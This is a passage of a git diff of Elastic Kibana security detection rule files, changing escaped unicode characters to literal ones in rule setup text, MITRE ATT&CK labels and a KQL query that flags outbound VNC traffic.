100644 --- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json index 7db63b7cf92..9f9ac17910d 100644 --- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json index c39516f00e0..67ee69fba4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json index d55a8e1d13f..82fe69d8df6 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json index 80e1f232ade..1fc0145e37c 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json index 8119898a986..06303ea6cf8 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json index c3a15daf7c2..f6d190529bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json index bacfd46f610..7a8db8fd63e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json index 04520e62d25..c66ae26f697 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json index 9b1ee729e69..50869dc6916 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json index f83d8bfe379..c082993e02e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json index 6c6143875f7..67f878db0c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json +++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) to the Internet", - "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json index 1dd1a88d56c..e585e50a2ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json +++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) to the Internet", - "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json index 44f54602b9d..cadd6b82b61 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json +++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) to the Internet", - "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json index 9015ed5b297..6bd27139d6e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) to the Internet", - "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json index e1e2d2d533b..a45c2aad833 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json index 230b188d559..b467f9f072b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json index 7d6a5d412a7..deb73ce29ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json index 425c352b9c5..257730f6baf 100644 --- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json index 0ee26cc8fc0..beb375ea9e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json index 4674c2c2335..2f5a9cfd11e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json index b5e03d91822..fb94de52a76 100644 --- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json index 25625387d44..700bd5e981c 100644 --- 